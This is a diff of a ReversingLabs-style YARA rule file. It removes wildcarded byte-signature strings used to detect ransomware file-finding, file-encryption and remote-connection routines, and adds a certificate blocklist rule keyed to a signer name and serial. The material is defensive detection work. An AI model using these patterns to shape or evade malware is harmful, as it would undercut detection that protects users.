-            ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? FF 75 ?? E8 ??
-            ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 8B F0 89 75 ?? 56 51 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 6A ?? 57 E8 ?? ?? ?? ?? 6A ?? 8B D7 8B CE E8 ?? ?? ?? ?? 83 C4 ?? 89
-            45 ?? C7 45 ?? ?? ?? ?? ?? 8D 70 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 56 8B D0 8B
-            7D ?? 8B CF E8 ?? ?? ?? ?? 83 C4 ?? 56 8B 75 ?? 56 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ??
-            85 FF 74 ?? 8B CF E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 8B 7D ?? 8B 75 ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4
-            ?? 8B 45 ?? 85 C0 7E ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 85 C0 7E ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 57 FF 15 ?? ?? ?? ?? 83 E0 ?? 50 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ??
-            ?? ?? B0 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D 8B E3 5B C3
-        }
-		$find_files_v2_p1 = {
-            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 8B C2 8B D9 89 45 ?? 89 5D ?? 56 57 66 83
-            F8 ?? 75 ?? 80 3D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            6A ?? 50 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B CB 89 45 ?? 83 C4 ?? 66 A1 ?? ?? ?? ?? 66
-            89 45 ?? 8D 51 ?? 66 0F 1F 44 00 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 81
-            F9 ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
-            ?? 0F B7 85 ?? ?? ?? ?? 8B F0 8D 48 ?? 8D 46 ?? 66 83 F9 ?? 0F B7 D0 8B CE 8B C6 0F
-            47 D0 0F B7 03 0F B7 FA 8B D0 83 C0 ?? 0F B7 D8 66 83 F8 ?? 8B C6 76 ?? 0F B7 F0 83
-            FB ?? 8D 42 ?? 0F B7 C8 8B C2 0F 47 C8 66 3B F9 8B 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 56 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF D7 8B 5D ?? 83 C4 ?? 0F B7
-            03 8B F0 8B C8 83 C1 ?? 66 83 F9 ?? 8D 46 ?? 0F B7 D0 8B C6 0F 47 D0 0F B7 85 ?? ??
-            ?? ?? 8B C8 66 89 13 8D 50 ?? 8D 41 ?? 66 83 FA ?? 0F B7 F0 8B C1 8B CB 0F 47 F0 66
-            89 B5 ?? ?? ?? ?? 8D 51 ?? 0F 1F 00 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 83
-            F9 ?? 76 ?? 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ??
-            EB ?? 8B 5D ?? 53 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF D7 83 C4 ?? 8D 85 ?? ?? ??
-            ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B
-            8D ?? ?? ?? ?? 8D 41 ?? 66 83 F8 ?? 77 ?? 8D 41 ?? 0F B7 F8 EB ?? 0F B7 F9 0F B7 03
-        }
-		$find_files_v2_p2 = {
-            8B F0 8B C8 83 C1 ?? 66 83 F9 ?? 8D 46 ?? 0F B7 D0 8B C6 0F 47 D0 66 3B FA 8B 95 ??
-            ?? ?? ?? 75 ?? 83 FA ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 70 ?? 66 8B 08 83 C0
-            ?? 66 85 C9 75 ?? 2B C6 D1 F8 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 83 FA ?? 0F 84 ?? ??
-            ?? ?? 81 FA ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 C2 ?? 0F 84 ?? ?? ?? ?? 8D 4D ?? 8D 85
-            ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83
-            C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D
-            4D ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51
-            ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ??
-            ?? ?? ?? 33 C0 53 66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 55
-            ?? 8D 8D ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 C0 53 66 89 85 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ??
-            50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 66 83 F8
-        }
-		$find_files_v2_p3 = {
-            75 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 51 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 83 C4 ?? EB ?? 66 83 F8 ?? 75 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 85 C0 74 ?? 83 EC ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 66 89 85 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 66 83 F8 ?? 75 ?? 8D 85 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 33 F6 0F 1F 00
-            80 BE ?? ?? ?? ?? ?? 8D 8E ?? ?? ?? ?? 74 ?? 57 6A ?? 6A ?? 51 E8 ?? ?? ?? ?? 46 83
-            C4 ?? 81 FE ?? ?? ?? ?? 7C ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? FF 15 ?? ?? ?? ??
-            5F 5E 5B 8B E5 5D C3
-        }
-		$encrypt_files_v2_p1 = {
-            53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ??
-            ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 51 53 81 EC ?? ?? ?? ?? 53 56 57 89 65
-            ?? 8B F1 89 75 ?? C7 45 ?? ?? ?? ?? ?? 0F 57 C0 0F 11 85 ?? ?? ?? ?? 0F 11 45 ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 0F 13 45 ?? 66 0F 13
-            45 ?? 66 0F 13 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 56 68 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 56 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 8E ??
-            ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4E ?? 0F 1F 80 ?? ?? ?? ??
-            66 8B 06 83 C6 ?? 66 85 C0 75 ?? 2B F1 D1 FE 83 C6 ?? 89 75 ?? C7 45 ?? ?? ?? ?? ??
-            33 C9 8B C6 BA ?? ?? ?? ?? F7 E2 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B
-            F8 89 7D ?? 33 C0 66 89 07 FF 75 ?? 56 57 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56
-            57 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 57 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ??
-            ?? 6A ?? 68 ?? ?? ?? ?? 57 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 8E ??
-            ?? ?? ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ??
-            8B CA 89 4D ?? 85 C9 0F 8C ?? ?? ?? ?? 7F ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 89 7D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? BA ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 6A ?? 8D 45 ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 68 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 90 68 ?? ?? ?? ?? 57 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B C8 89
-        }
-		$encrypt_files_v2_p2 = {
-            4D ?? 99 8B F0 89 75 ?? 89 55 ?? C7 45 ?? ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? 7E ?? B9 ??
-            ?? ?? ?? 8B F7 8D BD ?? ?? ?? ?? F3 A5 8D 45 ?? 50 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50
-            68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 8B 7D ??
-            57 8B 75 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ??
-            ?? 83 C4 ?? 8B 75 ?? 56 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 51 57 8D 85
-            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50
-            56 8D 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? 50
-            FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 03 C6 89 45 ?? 8B 4D ?? 13 4D ?? 89 4D ??
-            3B 4D ?? 0F 8C ?? ?? ?? ?? 7F ?? 3B 45 ?? 0F 82 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF
-            75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ??
-            ?? ?? 8B F0 89 75 ?? 56 51 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 57 E8
-            ?? ?? ?? ?? 6A ?? 8B D7 8B CE E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? C7 45 ?? ?? ?? ?? ??
-            8D 70 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 56 8B D0 8B 7D ?? 8B CF E8 ?? ?? ?? ??
-            83 C4 ?? 56 8B 75 ?? 56 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 FF 74 ?? 8B CF E8 ?? ??
-            ?? ?? 8B 45 ?? 85 C0 74 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 56 E8 ?? ?? ?? ??
-            83 C4 ?? 8B 7D ?? 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 85 C0 7E ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 8B 75 ?? 8B 45 ?? 85 C0 7E ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ??
-            ?? ?? 83 C4 ?? B0 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D 8B E3 5B C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $manage_gui_p* ) ) and ( ( ( all of ( $find_files_v1_p* ) ) and ( all of ( $encrypt_files_v1_p* ) ) ) or ( ( all of ( $find_files_v2_p* ) ) and ( all of ( $encrypt_files_v2_p* ) ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "5c:26:25:fa:83:6a:64:f4:88:2c:56:cc:7a:45:f0:ed" and 1474416000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Asn1Encoder : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_7Df6Fa580F84493C414Ee0E431086737 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects ASN1Encoder ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5fa361e5-4ab0-5856-92b2-6f434e33c350"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "27afa64e-0c9e-58ca-a4e1-db97cde66427"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.ASN1Encoder.yara#L1-L136"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "000fd846fa5f09af19ead4623bb5a8eb51cdb4c751013569bf070710d3e0d61d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15462-L15478"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ef244587c9eb1e1cb2f8a9c161e5dd9ff70e9764586f16e011334400ee400ed9"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "ASN1Encoder"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$remote_connection_p1 = {
-            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 0F B6
-            84 34 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 2B C6 68 ?? ?? ?? ?? 03 C0 50 53 E8 ?? ?? ?? ??
-            83 C4 ?? 83 C3 ?? 46 83 FE ?? 72 ?? 8B 5C 24 ?? BE ?? ?? ?? ?? A1 ?? ?? ?? ?? 53 50
-            68 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 56 50
-            E8 ?? ?? ?? ?? 33 C0 83 C4 ?? 8B F0 85 FF 74 ?? A1 ?? ?? ?? ?? 0F B6 04 06 50 B8 ??
-            ?? ?? ?? 2B C6 68 ?? ?? ?? ?? 03 C0 50 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 C3 ?? 46 3B F7
-            72 ?? 8B 5C 24 ?? A1 ?? ?? ?? ?? BE ?? ?? ?? ?? 53 50 68 ?? ?? ?? ?? 56 50 E8 ?? ??
-            ?? ?? A1 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 8D 8C 24 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? C1 E8 ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 8D 94 24 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 8B FB 8B F0 0F B6
-            84 34 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 2B C6 68 ?? ?? ?? ?? 03 C0 50 57 E8 ?? ?? ?? ??
-            83 C4 ?? 83 C7 ?? 46 83 FE ?? 72 ?? A1 ?? ?? ?? ?? 53 50 68 ?? ?? ?? ?? BB ?? ?? ??
-            ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 50 68 ?? ??
-            ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 50 68 ??
-            ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 50 68
-            ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? 33 F6 8D 51 ?? 66 8B 01
-            83 C1 ?? 66 3B C6 75 ?? 2B CA 8B 15 ?? ?? ?? ?? D1 F9 8D 72 ?? 8A 02 42 84 C0 75 ??
-            8B 3D ?? ?? ?? ?? 2B D6 8D 04 0A 8D 34 45 ?? ?? ?? ?? 56 6A ?? FF D7 50 FF 15 ?? ??
-            ?? ?? 8B D8 8D 04 36 50 6A ?? 89 5C 24 ?? FF D7 50 FF 15 ?? ?? ?? ?? FF 35 ?? ?? ??
-            ?? 8B F8 FF 35 ?? ?? ?? ?? 89 7C 24 ?? 68 ?? ?? ?? ?? 56 53 E8 ?? ?? ?? ?? 33 C9 89
-        }
-		$remote_connection_p2 = {
-            44 24 ?? 83 C4 ?? 89 8C 24 ?? ?? ?? ?? 8B D9 85 C0 7E ?? 8B 44 24 ?? 0F B7 04 58 66
-            89 84 24 ?? ?? ?? ?? 83 F8 ?? 75 ?? 83 EF ?? 66 8B 47 ?? 83 C7 ?? 66 3B C1 75 ?? BE
-            ?? ?? ?? ?? 83 C3 ?? A5 A5 66 A5 EB ?? 8D 94 24 ?? ?? ?? ?? 8B F2 66 8B 02 83 C2 ??
-            66 3B C1 75 ?? 2B D6 83 EF ?? 66 8B 47 ?? 83 C7 ?? 66 3B C1 75 ?? 8B CA C1 E9 ?? F3
-            A5 8B CA 83 E1 ?? F3 A4 33 C9 8B 7C 24 ?? 43 3B 5C 24 ?? 7C ?? FF 74 24 ?? 51 FF 15
-            ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 50 FF D6 FF 35 ?? ?? ?? ?? 33 C0 50 FF 15 ?? ?? ?? ??
-            50 FF D6 8B 5C 24 ?? 53 33 DB 53 FF 15 ?? ?? ?? ?? 50 FF D6 FF 74 24 ?? 53 FF 15 ??
-            ?? ?? ?? 50 FF D6 FF 74 24 ?? 53 FF 15 ?? ?? ?? ?? 50 FF D6 8B 5C 24 ?? 89 3D ?? ??
-            ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 33 FF E9 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ??
-            83 F8 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 57
-            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? 85 C0
-            0F 84 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 8B F3 89 5C 24 ?? 8D 4E ?? 8A 06 46 84
-            C0 75 ?? 8B 3D ?? ?? ?? ?? 2B F1 68 ?? ?? ?? ?? 6A ?? FF D7 50 FF 15 ?? ?? ?? ?? 89
-            44 24 ?? 85 DB 0F 84 ?? ?? ?? ?? 81 FE ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            6A ?? FF D7 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 89 44 24 ?? 8D 84 24 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ??
-            ?? ?? BA ?? ?? ?? ?? C1 E8 ?? 50 E8 ?? ?? ?? ?? 59 8D 94 24 ?? ?? ?? ?? 8D 8C 24 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 8B C8 8B F8 3B FE 73 ?? 81 F9 ?? ?? ?? ?? 74 ?? FF 74
-            24 ?? 8D 84 24 ?? ?? ?? ?? 50 8D 04 1F 50 E8
-        }
-		$encrypt_files_p1 = {
-            8B CA 8D 84 24 ?? ?? ?? ?? C1 E9 ?? F3 A5 53 68 ?? ?? ?? ?? 6A ?? 53 6A ?? 8B CA 83
-            E1 ?? 68 ?? ?? ?? ?? F3 A4 50 FF 15 ?? ?? ?? ?? 8B D8 33 FF 89 5C 24 ?? 89 3D ?? ??
-            ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 44
-            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 83 FB ?? 74 ?? 85 DB 0F 85 ?? ?? ?? ?? 33
-            F6 8D 8C 24 ?? ?? ?? ?? 8B DE E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? BE ?? ?? ?? ?? 50
-            8D 44 24 ?? 8B D6 50 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 8B CE E8 ?? ?? ?? ?? 33 D2
-            8D 88 ?? ?? ?? ?? 8D 81 ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ?? 8B 44 24 ?? C1 E8 ?? 89
-            44 24 ?? 83 C0 ?? 89 44 24 ?? 8B F0 8B C1 F7 F6 40 0F AF 44 24 ?? 50 6A ?? 89 44 24
-            ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? 6A ?? FF 15 ?? ??
-            ?? ?? 50 FF 15 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 89 44 24 ?? E8 ?? ?? ?? ?? 8B 54 24 ??
-            8D 44 24 ?? 83 C4 ?? 81 C2 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 8D 8C 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 39 5C 24 ?? 76 ?? 8B 44 24 ?? 8D
-            54 24 ?? 8B 4C 24 ?? 2B C3 3B 44 24 ?? 0F 42 F0 8D 84 24 ?? ?? ?? ?? 50 8B 44 24 ??
-            8D 0C 39 68 ?? ?? ?? ?? 03 C3 56 50 E8 ?? ?? ?? ?? 03 7C 24 ?? 83 C4 ?? 03 DE 3B 7C
-            24 ?? 72 ?? 33 FF 8D 84 24 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 6A ?? 57 6A ?? 68 ?? ?? ??
-            ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 5C 24 ?? 83 FB ?? 74 ?? 85 DB 74 ?? 57 8D 44 24 ??
-            89 7C 24 ?? 8B 3D ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF D7 33 F6 8D 44
-        }
-		$encrypt_files_p2 = {
-            24 ?? 56 50 FF 74 24 ?? FF 74 24 ?? 53 FF D7 33 FF 68 ?? ?? ?? ?? 57 68 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 83 C4 ?? FF 74 24 ?? 57 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 50 FF D6
-            FF 74 24 ?? 57 FF 15 ?? ?? ?? ?? 50 FF D6 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ??
-            ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 6A ?? FF 15
-            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 33 F6 56 53 FF 15 ?? ?? ?? ?? 3D ??
-            ?? ?? ?? 76 ?? 39 35 ?? ?? ?? ?? 75 ?? 56 53 FF 15 ?? ?? ?? ?? 56 8B F8 B8 ?? ?? ??
-            ?? 56 50 53 2B F8 FF 15 ?? ?? ?? ?? 57 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
-            56 8D 8C 24 ?? ?? ?? ?? A3 ?? ?? ?? ?? 51 57 50 53 FF 15 ?? ?? ?? ?? 33 C0 50 50 50
-            53 FF 15 ?? ?? ?? ?? 33 F6 8D 84 24 ?? ?? ?? ?? 56 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            53 FF 15 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF
-            15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D8 6A ?? 89 5C 24 ?? FF 15 ??
-            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 50
-            FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? BA
-            ?? ?? ?? ?? C1 E8 ?? 50 E8 ?? ?? ?? ?? 59 8D 94 24 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 85 C9 75 ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ??
-            50 FF 15
-        }
-		$find_files = {
-            53 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 35 ?? ?? ?? ?? FF D6 83 C4 ?? 53 8D 85 ??
-            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF D6 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ??
-            ?? 50 FF 15 ?? ?? ?? ?? 8B F0 89 75 ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 85 F6 0F 84 ?? ??
-            ?? ?? 33 DB B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ??
-            66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 8B C3 EB ?? 1B C0 83
